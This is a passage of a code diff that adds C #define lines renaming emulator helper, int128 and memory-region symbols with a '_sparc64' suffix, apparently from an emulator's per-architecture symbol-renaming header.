+#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_sparc64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_sparc64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_sparc64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_sparc64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_sparc64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_sparc64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_sparc64 +#define 
helper_neon_hadd_u8 helper_neon_hadd_u8_sparc64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_sparc64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_sparc64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_sparc64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_sparc64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_sparc64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_sparc64 +#define helper_neon_max_s16 helper_neon_max_s16_sparc64 +#define helper_neon_max_s32 helper_neon_max_s32_sparc64 +#define helper_neon_max_s8 helper_neon_max_s8_sparc64 +#define helper_neon_max_u16 helper_neon_max_u16_sparc64 +#define helper_neon_max_u32 helper_neon_max_u32_sparc64 +#define helper_neon_max_u8 helper_neon_max_u8_sparc64 +#define helper_neon_min_s16 helper_neon_min_s16_sparc64 +#define helper_neon_min_s32 helper_neon_min_s32_sparc64 +#define helper_neon_min_s8 helper_neon_min_s8_sparc64 +#define helper_neon_min_u16 helper_neon_min_u16_sparc64 +#define helper_neon_min_u32 helper_neon_min_u32_sparc64 +#define helper_neon_min_u8 helper_neon_min_u8_sparc64 +#define helper_neon_mull_p8 helper_neon_mull_p8_sparc64 +#define helper_neon_mull_s16 helper_neon_mull_s16_sparc64 +#define helper_neon_mull_s8 helper_neon_mull_s8_sparc64 +#define helper_neon_mull_u16 helper_neon_mull_u16_sparc64 +#define helper_neon_mull_u8 helper_neon_mull_u8_sparc64 +#define helper_neon_mul_p8 helper_neon_mul_p8_sparc64 +#define helper_neon_mul_u16 helper_neon_mul_u16_sparc64 +#define helper_neon_mul_u8 helper_neon_mul_u8_sparc64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_sparc64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_sparc64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_sparc64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_sparc64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_sparc64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_sparc64 +#define 
helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_sparc64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_sparc64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_sparc64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_sparc64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_sparc64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_sparc64 +#define helper_neon_negl_u16 helper_neon_negl_u16_sparc64 +#define helper_neon_negl_u32 helper_neon_negl_u32_sparc64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_sparc64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_sparc64 +#define helper_neon_padd_u16 helper_neon_padd_u16_sparc64 +#define helper_neon_padd_u8 helper_neon_padd_u8_sparc64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_sparc64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_sparc64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_sparc64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_sparc64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_sparc64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_sparc64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_sparc64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_sparc64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_sparc64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_sparc64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_sparc64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_sparc64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_sparc64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_sparc64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_sparc64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_sparc64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_sparc64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_sparc64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_sparc64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_sparc64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_sparc64 +#define 
helper_neon_qadd_u8 helper_neon_qadd_u8_sparc64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_sparc64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_sparc64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_sparc64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_sparc64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_sparc64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_sparc64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_sparc64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_sparc64 +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_sparc64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_sparc64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_sparc64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_sparc64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_sparc64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_sparc64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_sparc64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_sparc64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_sparc64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_sparc64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_sparc64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_sparc64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_sparc64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_sparc64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_sparc64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_sparc64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_sparc64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_sparc64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_sparc64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_sparc64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_sparc64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_sparc64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_sparc64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_sparc64 +#define helper_neon_qsub_u16 
helper_neon_qsub_u16_sparc64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_sparc64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_sparc64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_sparc64 +#define helper_neon_qunzip16 helper_neon_qunzip16_sparc64 +#define helper_neon_qunzip32 helper_neon_qunzip32_sparc64 +#define helper_neon_qunzip8 helper_neon_qunzip8_sparc64 +#define helper_neon_qzip16 helper_neon_qzip16_sparc64 +#define helper_neon_qzip32 helper_neon_qzip32_sparc64 +#define helper_neon_qzip8 helper_neon_qzip8_sparc64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_sparc64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_sparc64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_sparc64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_sparc64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_sparc64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_sparc64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_sparc64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_sparc64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_sparc64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_sparc64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_sparc64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_sparc64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_sparc64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_sparc64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_sparc64 +#define helper_neon_shl_s16 helper_neon_shl_s16_sparc64 +#define helper_neon_shl_s32 helper_neon_shl_s32_sparc64 +#define helper_neon_shl_s64 helper_neon_shl_s64_sparc64 +#define helper_neon_shl_s8 helper_neon_shl_s8_sparc64 +#define helper_neon_shl_u16 helper_neon_shl_u16_sparc64 +#define helper_neon_shl_u32 helper_neon_shl_u32_sparc64 +#define helper_neon_shl_u64 helper_neon_shl_u64_sparc64 +#define helper_neon_shl_u8 helper_neon_shl_u8_sparc64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_sparc64 +#define helper_neon_sqadd_u32 
helper_neon_sqadd_u32_sparc64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_sparc64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_sparc64 +#define helper_neon_subl_u16 helper_neon_subl_u16_sparc64 +#define helper_neon_subl_u32 helper_neon_subl_u32_sparc64 +#define helper_neon_sub_u16 helper_neon_sub_u16_sparc64 +#define helper_neon_sub_u8 helper_neon_sub_u8_sparc64 +#define helper_neon_tbl helper_neon_tbl_sparc64 +#define helper_neon_tst_u16 helper_neon_tst_u16_sparc64 +#define helper_neon_tst_u32 helper_neon_tst_u32_sparc64 +#define helper_neon_tst_u8 helper_neon_tst_u8_sparc64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_sparc64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_sparc64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_sparc64 +#define helper_neon_unzip16 helper_neon_unzip16_sparc64 +#define helper_neon_unzip8 helper_neon_unzip8_sparc64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_sparc64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_sparc64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_sparc64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_sparc64 +#define helper_neon_widen_s16 helper_neon_widen_s16_sparc64 +#define helper_neon_widen_s8 helper_neon_widen_s8_sparc64 +#define helper_neon_widen_u16 helper_neon_widen_u16_sparc64 +#define helper_neon_widen_u8 helper_neon_widen_u8_sparc64 +#define helper_neon_zip16 helper_neon_zip16_sparc64 +#define helper_neon_zip8 helper_neon_zip8_sparc64 +#define helper_pre_hvc helper_pre_hvc_sparc64 +#define helper_pre_smc helper_pre_smc_sparc64 +#define helper_qadd16 helper_qadd16_sparc64 +#define helper_qadd8 helper_qadd8_sparc64 +#define helper_qaddsubx helper_qaddsubx_sparc64 +#define helper_qsub16 helper_qsub16_sparc64 +#define helper_qsub8 helper_qsub8_sparc64 +#define helper_qsubaddx helper_qsubaddx_sparc64 +#define helper_rbit helper_rbit_sparc64 +#define helper_recpe_f32 helper_recpe_f32_sparc64 +#define helper_recpe_f64 
helper_recpe_f64_sparc64 +#define helper_recpe_u32 helper_recpe_u32_sparc64 +#define helper_recps_f32 helper_recps_f32_sparc64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_sparc64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_sparc64 +#define helper_rintd helper_rintd_sparc64 +#define helper_rintd_exact helper_rintd_exact_sparc64 +#define helper_rints helper_rints_sparc64 +#define helper_rints_exact helper_rints_exact_sparc64 +#define helper_ror_cc helper_ror_cc_sparc64 +#define helper_rsqrte_f32 helper_rsqrte_f32_sparc64 +#define helper_rsqrte_f64 helper_rsqrte_f64_sparc64 +#define helper_rsqrte_u32 helper_rsqrte_u32_sparc64 +#define helper_rsqrts_f32 helper_rsqrts_f32_sparc64 +#define helper_sadd16 helper_sadd16_sparc64 +#define helper_sadd8 helper_sadd8_sparc64 +#define helper_saddsubx helper_saddsubx_sparc64 +#define helper_sar_cc helper_sar_cc_sparc64 +#define helper_sdiv helper_sdiv_sparc64 +#define helper_sel_flags helper_sel_flags_sparc64 +#define helper_set_cp_reg helper_set_cp_reg_sparc64 +#define helper_set_cp_reg64 helper_set_cp_reg64_sparc64 +#define helper_set_neon_rmode helper_set_neon_rmode_sparc64 +#define helper_set_r13_banked helper_set_r13_banked_sparc64 +#define helper_set_rmode helper_set_rmode_sparc64 +#define helper_set_user_reg helper_set_user_reg_sparc64 +#define helper_shadd16 helper_shadd16_sparc64 +#define helper_shadd8 helper_shadd8_sparc64 +#define helper_shaddsubx helper_shaddsubx_sparc64 +#define helper_shl_cc helper_shl_cc_sparc64 +#define helper_shr_cc helper_shr_cc_sparc64 +#define helper_shsub16 helper_shsub16_sparc64 +#define helper_shsub8 helper_shsub8_sparc64 +#define helper_shsubaddx helper_shsubaddx_sparc64 +#define helper_ssat helper_ssat_sparc64 +#define helper_ssat16 helper_ssat16_sparc64 +#define helper_ssub16 helper_ssub16_sparc64 +#define helper_ssub8 helper_ssub8_sparc64 +#define helper_ssubaddx 
helper_ssubaddx_sparc64 +#define helper_stb_mmu helper_stb_mmu_sparc64 +#define helper_stl_mmu helper_stl_mmu_sparc64 +#define helper_stq_mmu helper_stq_mmu_sparc64 +#define helper_stw_mmu helper_stw_mmu_sparc64 +#define helper_sub_saturate helper_sub_saturate_sparc64 +#define helper_sub_usaturate helper_sub_usaturate_sparc64 +#define helper_sxtb16 helper_sxtb16_sparc64 +#define helper_uadd16 helper_uadd16_sparc64 +#define helper_uadd8 helper_uadd8_sparc64 +#define helper_uaddsubx helper_uaddsubx_sparc64 +#define helper_udiv helper_udiv_sparc64 +#define helper_uhadd16 helper_uhadd16_sparc64 +#define helper_uhadd8 helper_uhadd8_sparc64 +#define helper_uhaddsubx helper_uhaddsubx_sparc64 +#define helper_uhsub16 helper_uhsub16_sparc64 +#define helper_uhsub8 helper_uhsub8_sparc64 +#define helper_uhsubaddx helper_uhsubaddx_sparc64 +#define helper_uqadd16 helper_uqadd16_sparc64 +#define helper_uqadd8 helper_uqadd8_sparc64 +#define helper_uqaddsubx helper_uqaddsubx_sparc64 +#define helper_uqsub16 helper_uqsub16_sparc64 +#define helper_uqsub8 helper_uqsub8_sparc64 +#define helper_uqsubaddx helper_uqsubaddx_sparc64 +#define helper_usad8 helper_usad8_sparc64 +#define helper_usat helper_usat_sparc64 +#define helper_usat16 helper_usat16_sparc64 +#define helper_usub16 helper_usub16_sparc64 +#define helper_usub8 helper_usub8_sparc64 +#define helper_usubaddx helper_usubaddx_sparc64 +#define helper_uxtb16 helper_uxtb16_sparc64 +#define helper_v7m_mrs helper_v7m_mrs_sparc64 +#define helper_v7m_msr helper_v7m_msr_sparc64 +#define helper_vfp_absd helper_vfp_absd_sparc64 +#define helper_vfp_abss helper_vfp_abss_sparc64 +#define helper_vfp_addd helper_vfp_addd_sparc64 +#define helper_vfp_adds helper_vfp_adds_sparc64 +#define helper_vfp_cmpd helper_vfp_cmpd_sparc64 +#define helper_vfp_cmped helper_vfp_cmped_sparc64 +#define helper_vfp_cmpes helper_vfp_cmpes_sparc64 +#define helper_vfp_cmps helper_vfp_cmps_sparc64 +#define helper_vfp_divd helper_vfp_divd_sparc64 +#define helper_vfp_divs 
helper_vfp_divs_sparc64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_sparc64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_sparc64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_sparc64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_sparc64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_sparc64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_sparc64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_sparc64 +#define helper_vfp_maxd helper_vfp_maxd_sparc64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_sparc64 +#define helper_vfp_maxnums helper_vfp_maxnums_sparc64 +#define helper_vfp_maxs helper_vfp_maxs_sparc64 +#define helper_vfp_mind helper_vfp_mind_sparc64 +#define helper_vfp_minnumd helper_vfp_minnumd_sparc64 +#define helper_vfp_minnums helper_vfp_minnums_sparc64 +#define helper_vfp_mins helper_vfp_mins_sparc64 +#define helper_vfp_muladdd helper_vfp_muladdd_sparc64 +#define helper_vfp_muladds helper_vfp_muladds_sparc64 +#define helper_vfp_muld helper_vfp_muld_sparc64 +#define helper_vfp_muls helper_vfp_muls_sparc64 +#define helper_vfp_negd helper_vfp_negd_sparc64 +#define helper_vfp_negs helper_vfp_negs_sparc64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_sparc64 +#define helper_vfp_shtod helper_vfp_shtod_sparc64 +#define helper_vfp_shtos helper_vfp_shtos_sparc64 +#define helper_vfp_sitod helper_vfp_sitod_sparc64 +#define helper_vfp_sitos helper_vfp_sitos_sparc64 +#define helper_vfp_sltod helper_vfp_sltod_sparc64 +#define helper_vfp_sltos helper_vfp_sltos_sparc64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_sparc64 +#define helper_vfp_sqrts helper_vfp_sqrts_sparc64 +#define helper_vfp_sqtod helper_vfp_sqtod_sparc64 +#define helper_vfp_sqtos helper_vfp_sqtos_sparc64 +#define helper_vfp_subd helper_vfp_subd_sparc64 +#define helper_vfp_subs helper_vfp_subs_sparc64 +#define helper_vfp_toshd helper_vfp_toshd_sparc64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_sparc64 
+#define helper_vfp_toshs helper_vfp_toshs_sparc64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_sparc64 +#define helper_vfp_tosid helper_vfp_tosid_sparc64 +#define helper_vfp_tosis helper_vfp_tosis_sparc64 +#define helper_vfp_tosizd helper_vfp_tosizd_sparc64 +#define helper_vfp_tosizs helper_vfp_tosizs_sparc64 +#define helper_vfp_tosld helper_vfp_tosld_sparc64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_sparc64 +#define helper_vfp_tosls helper_vfp_tosls_sparc64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_sparc64 +#define helper_vfp_tosqd helper_vfp_tosqd_sparc64 +#define helper_vfp_tosqs helper_vfp_tosqs_sparc64 +#define helper_vfp_touhd helper_vfp_touhd_sparc64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_sparc64 +#define helper_vfp_touhs helper_vfp_touhs_sparc64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_sparc64 +#define helper_vfp_touid helper_vfp_touid_sparc64 +#define helper_vfp_touis helper_vfp_touis_sparc64 +#define helper_vfp_touizd helper_vfp_touizd_sparc64 +#define helper_vfp_touizs helper_vfp_touizs_sparc64 +#define helper_vfp_tould helper_vfp_tould_sparc64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_sparc64 +#define helper_vfp_touls helper_vfp_touls_sparc64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_sparc64 +#define helper_vfp_touqd helper_vfp_touqd_sparc64 +#define helper_vfp_touqs helper_vfp_touqs_sparc64 +#define helper_vfp_uhtod helper_vfp_uhtod_sparc64 +#define helper_vfp_uhtos helper_vfp_uhtos_sparc64 +#define helper_vfp_uitod helper_vfp_uitod_sparc64 +#define helper_vfp_uitos helper_vfp_uitos_sparc64 +#define helper_vfp_ultod helper_vfp_ultod_sparc64 +#define helper_vfp_ultos helper_vfp_ultos_sparc64 +#define helper_vfp_uqtod helper_vfp_uqtod_sparc64 +#define helper_vfp_uqtos helper_vfp_uqtos_sparc64 +#define helper_wfe helper_wfe_sparc64 +#define helper_wfi 
helper_wfi_sparc64 +#define hex2decimal hex2decimal_sparc64 +#define hw_breakpoint_update hw_breakpoint_update_sparc64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_sparc64 +#define hw_watchpoint_update hw_watchpoint_update_sparc64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_sparc64 +#define _init _init_sparc64 +#define init_cpreg_list init_cpreg_list_sparc64 +#define init_lists init_lists_sparc64 +#define input_type_enum input_type_enum_sparc64 +#define int128_2_64 int128_2_64_sparc64 +#define int128_add int128_add_sparc64 +#define int128_addto int128_addto_sparc64 +#define int128_and int128_and_sparc64 +#define int128_eq int128_eq_sparc64 +#define int128_ge int128_ge_sparc64 +#define int128_get64 int128_get64_sparc64 +#define int128_gt int128_gt_sparc64 +#define int128_le int128_le_sparc64 +#define int128_lt int128_lt_sparc64 +#define int128_make64 int128_make64_sparc64 +#define int128_max int128_max_sparc64 +#define int128_min int128_min_sparc64 +#define int128_ne int128_ne_sparc64 +#define int128_neg int128_neg_sparc64 +#define int128_nz int128_nz_sparc64 +#define int128_rshift int128_rshift_sparc64 +#define int128_sub int128_sub_sparc64 +#define int128_subfrom int128_subfrom_sparc64 +#define int128_zero int128_zero_sparc64 +#define int16_to_float32 int16_to_float32_sparc64 +#define int16_to_float64 int16_to_float64_sparc64 +#define int32_to_float128 int32_to_float128_sparc64 +#define int32_to_float32 int32_to_float32_sparc64 +#define int32_to_float64 int32_to_float64_sparc64 +#define int32_to_floatx80 int32_to_floatx80_sparc64 +#define int64_to_float128 int64_to_float128_sparc64 +#define int64_to_float32 int64_to_float32_sparc64 +#define int64_to_float64 int64_to_float64_sparc64 +#define int64_to_floatx80 int64_to_floatx80_sparc64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_sparc64 +#define invalidate_page_bitmap invalidate_page_bitmap_sparc64 +#define io_mem_read io_mem_read_sparc64 +#define io_mem_write 
io_mem_write_sparc64 +#define io_readb io_readb_sparc64 +#define io_readl io_readl_sparc64 +#define io_readq io_readq_sparc64 +#define io_readw io_readw_sparc64 +#define iotlb_to_region iotlb_to_region_sparc64 +#define io_writeb io_writeb_sparc64 +#define io_writel io_writel_sparc64 +#define io_writeq io_writeq_sparc64 +#define io_writew io_writew_sparc64 +#define is_a64 is_a64_sparc64 +#define is_help_option is_help_option_sparc64 +#define isr_read isr_read_sparc64 +#define is_valid_option_list is_valid_option_list_sparc64 +#define iwmmxt_load_creg iwmmxt_load_creg_sparc64 +#define iwmmxt_load_reg iwmmxt_load_reg_sparc64 +#define iwmmxt_store_creg iwmmxt_store_creg_sparc64 +#define iwmmxt_store_reg iwmmxt_store_reg_sparc64 +#define __jit_debug_descriptor __jit_debug_descriptor_sparc64 +#define __jit_debug_register_code __jit_debug_register_code_sparc64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_sparc64 +#define last_ram_offset last_ram_offset_sparc64 +#define ldl_be_p ldl_be_p_sparc64 +#define ldl_be_phys ldl_be_phys_sparc64 +#define ldl_he_p ldl_he_p_sparc64 +#define ldl_le_p ldl_le_p_sparc64 +#define ldl_le_phys ldl_le_phys_sparc64 +#define ldl_phys ldl_phys_sparc64 +#define ldl_phys_internal ldl_phys_internal_sparc64 +#define ldq_be_p ldq_be_p_sparc64 +#define ldq_be_phys ldq_be_phys_sparc64 +#define ldq_he_p ldq_he_p_sparc64 +#define ldq_le_p ldq_le_p_sparc64 +#define ldq_le_phys ldq_le_phys_sparc64 +#define ldq_phys ldq_phys_sparc64 +#define ldq_phys_internal ldq_phys_internal_sparc64 +#define ldst_name ldst_name_sparc64 +#define ldub_p ldub_p_sparc64 +#define ldub_phys ldub_phys_sparc64 +#define lduw_be_p lduw_be_p_sparc64 +#define lduw_be_phys lduw_be_phys_sparc64 +#define lduw_he_p lduw_he_p_sparc64 +#define lduw_le_p lduw_le_p_sparc64 +#define lduw_le_phys lduw_le_phys_sparc64 +#define lduw_phys lduw_phys_sparc64 +#define lduw_phys_internal lduw_phys_internal_sparc64 +#define le128 le128_sparc64 +#define linked_bp_matches linked_bp_matches_sparc64 +#define 
listener_add_address_space listener_add_address_space_sparc64 +#define load_cpu_offset load_cpu_offset_sparc64 +#define load_reg load_reg_sparc64 +#define load_reg_var load_reg_var_sparc64 +#define log_cpu_state log_cpu_state_sparc64 +#define lpae_cp_reginfo lpae_cp_reginfo_sparc64 +#define lt128 lt128_sparc64 +#define machine_class_init machine_class_init_sparc64 +#define machine_finalize machine_finalize_sparc64 +#define machine_info machine_info_sparc64 +#define machine_initfn machine_initfn_sparc64 +#define machine_register_types machine_register_types_sparc64 +#define machvirt_init machvirt_init_sparc64 +#define machvirt_machine_init machvirt_machine_init_sparc64 +#define maj maj_sparc64 +#define mapping_conflict mapping_conflict_sparc64 +#define mapping_contiguous mapping_contiguous_sparc64 +#define mapping_have_same_region mapping_have_same_region_sparc64 +#define mapping_merge mapping_merge_sparc64 +#define mem_add mem_add_sparc64 +#define mem_begin mem_begin_sparc64 +#define mem_commit mem_commit_sparc64 +#define memory_access_is_direct memory_access_is_direct_sparc64 +#define memory_access_size memory_access_size_sparc64 +#define memory_init memory_init_sparc64 +#define memory_listener_match memory_listener_match_sparc64 +#define memory_listener_register memory_listener_register_sparc64 +#define memory_listener_unregister memory_listener_unregister_sparc64 +#define memory_map_init memory_map_init_sparc64 +#define memory_mapping_filter memory_mapping_filter_sparc64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_sparc64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc64 +#define memory_mapping_list_free memory_mapping_list_free_sparc64 +#define memory_mapping_list_init memory_mapping_list_init_sparc64 +#define memory_region_access_valid memory_region_access_valid_sparc64 +#define memory_region_add_subregion memory_region_add_subregion_sparc64 +#define 
memory_region_add_subregion_common memory_region_add_subregion_common_sparc64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc64 +#define memory_region_big_endian memory_region_big_endian_sparc64 +#define memory_region_clear_pending memory_region_clear_pending_sparc64 +#define memory_region_del_subregion memory_region_del_subregion_sparc64 +#define memory_region_destructor_alias memory_region_destructor_alias_sparc64 +#define memory_region_destructor_none memory_region_destructor_none_sparc64 +#define memory_region_destructor_ram memory_region_destructor_ram_sparc64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_sparc64 +#define memory_region_dispatch_read memory_region_dispatch_read_sparc64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_sparc64 +#define memory_region_dispatch_write memory_region_dispatch_write_sparc64 +#define memory_region_escape_name memory_region_escape_name_sparc64 +#define memory_region_finalize memory_region_finalize_sparc64 +#define memory_region_find memory_region_find_sparc64 +#define memory_region_get_addr memory_region_get_addr_sparc64 +#define memory_region_get_alignment memory_region_get_alignment_sparc64 +#define memory_region_get_container memory_region_get_container_sparc64 +#define memory_region_get_fd memory_region_get_fd_sparc64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_sparc64 +#define memory_region_get_priority memory_region_get_priority_sparc64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_sparc64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc64 +#define memory_region_get_size memory_region_get_size_sparc64 +#define memory_region_info memory_region_info_sparc64 +#define memory_region_init memory_region_init_sparc64 +#define memory_region_init_alias memory_region_init_alias_sparc64 +#define memory_region_initfn memory_region_initfn_sparc64 +#define memory_region_init_io 
memory_region_init_io_sparc64 +#define memory_region_init_ram memory_region_init_ram_sparc64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc64 +#define memory_region_init_reservation memory_region_init_reservation_sparc64 +#define memory_region_is_iommu memory_region_is_iommu_sparc64 +#define memory_region_is_logging memory_region_is_logging_sparc64 +#define memory_region_is_mapped memory_region_is_mapped_sparc64 +#define memory_region_is_ram memory_region_is_ram_sparc64 +#define memory_region_is_rom memory_region_is_rom_sparc64 +#define memory_region_is_romd memory_region_is_romd_sparc64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_sparc64 +#define memory_region_is_unassigned memory_region_is_unassigned_sparc64 +#define memory_region_name memory_region_name_sparc64 +#define memory_region_need_escape memory_region_need_escape_sparc64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_sparc64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_sparc64 +#define memory_region_present memory_region_present_sparc64 +#define memory_region_read_accessor memory_region_read_accessor_sparc64 +#define memory_region_readd_subregion memory_region_readd_subregion_sparc64 +#define memory_region_ref memory_region_ref_sparc64 +#define memory_region_resolve_container memory_region_resolve_container_sparc64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_sparc64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc64 +#define memory_region_set_address memory_region_set_address_sparc64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_sparc64 +#define memory_region_set_enabled memory_region_set_enabled_sparc64 +#define memory_region_set_readonly memory_region_set_readonly_sparc64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_sparc64 +#define memory_region_size 